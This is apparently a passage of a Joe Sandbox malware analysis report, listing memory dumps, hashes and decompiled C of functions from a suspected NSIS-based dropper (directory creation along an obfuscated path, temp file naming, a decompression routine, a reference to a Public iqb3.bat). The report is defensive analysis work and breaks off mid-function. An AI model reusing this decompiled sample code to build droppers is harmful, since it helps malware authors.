                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                      • String ID: `7B
                                                                      • API String ID: 2987980305-3208876730
                                                                      • Opcode ID: 201cf913fe3424f9cc0766cc668a4e4f41d460d18a5e3c080de9af1d3ac2d500
                                                                      • Instruction ID: f6a91bdf01fdb4a856c4cb7ab8675b48806981152caa269ce110007ec06e39c8
                                                                      • Opcode Fuzzy Hash: 201cf913fe3424f9cc0766cc668a4e4f41d460d18a5e3c080de9af1d3ac2d500
                                                                      • Instruction Fuzzy Hash: 3321D872904215F6CF107FA4CE4DA6E79B0AB44358F60823BF601B62D0DBBD4941DA5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 689 4015b3-4015c6 call 4029fd call 405807 694 4015c8-4015e3 call 405799 CreateDirectoryA 689->694 695 40160a-40160d 689->695 703 401600-401608 694->703 704 4015e5-4015f0 GetLastError 694->704 697 401638-402181 call 401423 695->697 698 40160f-40162a call 401423 call 405cde SetCurrentDirectoryA 695->698 710 402892-4028a1 697->710 698->710 713 401630-401633 698->713 703->694 703->695 707 4015f2-4015fb GetFileAttributesA 704->707 708 4015fd 704->708 707->703 707->708 708->703 713->710
                                                                      C-Code - Quality: 85%
                                                                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t12;
				int _t18;
				int _t21;
				struct _SECURITY_ATTRIBUTES* _t22;
				signed char _t24;
				struct _SECURITY_ATTRIBUTES* _t25;
				CHAR* _t27;
				struct _SECURITY_ATTRIBUTES** _t31;
				void* _t32;

				_t25 = __ebx;
				_t27 = E004029FD(0xfffffff0);
				_t12 = E00405807(_t27);
				_t29 = _t12;
				if(_t12 != __ebx) {
					do {
						_t31 = E00405799(_t29, 0x5c);
						 *_t31 = _t25;
						 *((char*)(_t32 + 0xb)) =  *_t31;
						_t21 = CreateDirectoryA(_t27, _t25); // executed
						if(_t21 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t27); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t22 =  *((intOrPtr*)(_t32 + 0xb));
						 *_t31 = _t22;
						_t29 =  &(_t31[0]);
					} while (_t22 != _t25);
				}
				if( *((intOrPtr*)(_t32 - 0x20)) == _t25) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CDE("C:\\Users\\engineer\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses", _t27);
					_t18 = SetCurrentDirectoryA(_t27); // executed
					if(_t18 == 0) {
						 *((intOrPtr*)(_t32 - 4)) =  *((intOrPtr*)(_t32 - 4)) + 1;
					}
				}
				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}












                                                                      0x004015b3
                                                                      0x004015ba
                                                                      0x004015bd
                                                                      0x004015c2
                                                                      0x004015c6
                                                                      0x004015c8
                                                                      0x004015d0
                                                                      0x004015d6
                                                                      0x004015d8
                                                                      0x004015db
                                                                      0x004015e3
                                                                      0x004015f0
                                                                      0x004015fd
                                                                      0x004015fd
                                                                      0x004015f2
                                                                      0x004015f3
                                                                      0x004015fb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004015fb
                                                                      0x004015f0
                                                                      0x00401600
                                                                      0x00401603
                                                                      0x00401605
                                                                      0x00401606
                                                                      0x004015c8
                                                                      0x0040160d
                                                                      0x00401638
                                                                      0x0040217c
                                                                      0x0040160f
                                                                      0x00401611
                                                                      0x0040161c
                                                                      0x00401622
                                                                      0x0040162a
                                                                      0x00401630
                                                                      0x00401630
                                                                      0x0040162a
                                                                      0x00402895
                                                                      0x004028a1

                                                                      APIs
                                                                        • Part of subcall function 00405807: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,00405873,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,C:\Users\user\AppData\Local\Temp\nsaB4A6.tmp,?,?,746AF560,004055BE,?,C:\Users\user\AppData\Local\Temp\,746AF560,00000000), ref: 00405815
                                                                        • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040581A
                                                                        • Part of subcall function 00405807: CharNextA.USER32(00000000), ref: 0040582E
                                                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses,00000000,00000000,000000F0), ref: 00401622
                                                                      Strings
                                                                      • C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses, xrefs: 00401617
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                      • String ID: C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses
                                                                      • API String ID: 3751793516-3637290404
                                                                      • Opcode ID: 89d0ce7e600e8662a05959566325a5d33867861d9ae3ac1bc10afdb4933677a5
                                                                      • Instruction ID: c68c5a489683e2fc4659e16c9c4aaa0bba9656052562f70290055e8dde3f70bb
                                                                      • Opcode Fuzzy Hash: 89d0ce7e600e8662a05959566325a5d33867861d9ae3ac1bc10afdb4933677a5
                                                                      • Instruction Fuzzy Hash: E011E532908150ABDB117F755D4496F77B4EA62366728473FF891B22E2C23C4D42DA3E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040599E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 715 40599e-4059a8 716 4059a9-4059d4 GetTickCount GetTempFileNameA 715->716 717 4059e3-4059e5 716->717 718 4059d6-4059d8 716->718 720 4059dd-4059e0 717->720 718->716 719 4059da 718->719 719->720
                                                                      C-Code - Quality: 100%
                                                                      			E0040599E(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x409380; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                                      0x004059a2
                                                                      0x004059a8
                                                                      0x004059a9
                                                                      0x004059a9
                                                                      0x004059ae
                                                                      0x004059af
                                                                      0x004059b2
                                                                      0x004059bc
                                                                      0x004059c9
                                                                      0x004059cc
                                                                      0x004059d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004059d8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004059da
                                                                      0x00000000
                                                                      0x004059da
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004059B2
                                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\Public\iqb3.bat" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-2465227615
                                                                      • Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                                      • Instruction ID: 8c160f2977bc4404c48c8444970ea7289898f808bb444fb2a57fa0af4f665f22
                                                                      • Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
                                                                      • Instruction Fuzzy Hash: 4AF08976748304ABD7105F55DC04B9B7B98EF91760F148037F904DB180D5B49954C765
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406109 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 721 406109-40612c 722 406136-406139 721->722 723 40612e-406131 721->723 725 40613c-406145 722->725 724 406b56-406b5a 723->724 726 406b53 725->726 727 40614b 725->727 726->724 728 406152-406156 727->728 729 406292-406939 727->729 730 4061f7-4061fb 727->730 731 406267-40626b 727->731 732 40615c-406169 728->732 733 406b3e-406b51 728->733 742 406953-406969 729->742 743 40693b-406951 729->743 737 406201-40621a 730->737 738 406aa7-406ab1 730->738 734 406271-406285 731->734 735 406ab6-406ac0 731->735 732->726 739 40616f-4061b5 732->739 733->724 740 406288-406290 734->740 735->733 741 40621d-406221 737->741 738->733 745 4061b7-4061bb 739->745 746 4061dd-4061df 739->746 740->729 740->731 741->730 747 406223-406229 741->747 744 40696c-406973 742->744 743->744 754 406975-406979 744->754 755 40699a-4069a6 744->755 748 4061c6-4061d4 GlobalAlloc 745->748 749 4061bd-4061c0 GlobalFree 745->749 750 4061e1-4061eb 746->750 751 4061ed-4061f5 746->751 752 406253-406265 747->752 753 40622b-406232 747->753 748->726 759 4061da 748->759 749->748 750->750 750->751 751->741 752->740 760 406234-406237 GlobalFree 753->760 761 40623d-40624d GlobalAlloc 753->761 756 406b28-406b32 754->756 757 40697f-406997 754->757 755->725 756->733 757->755 759->746 760->761 761->726 761->752
                                                                      C-Code - Quality: 98%
                                                                      			E00406109(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406B5B))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
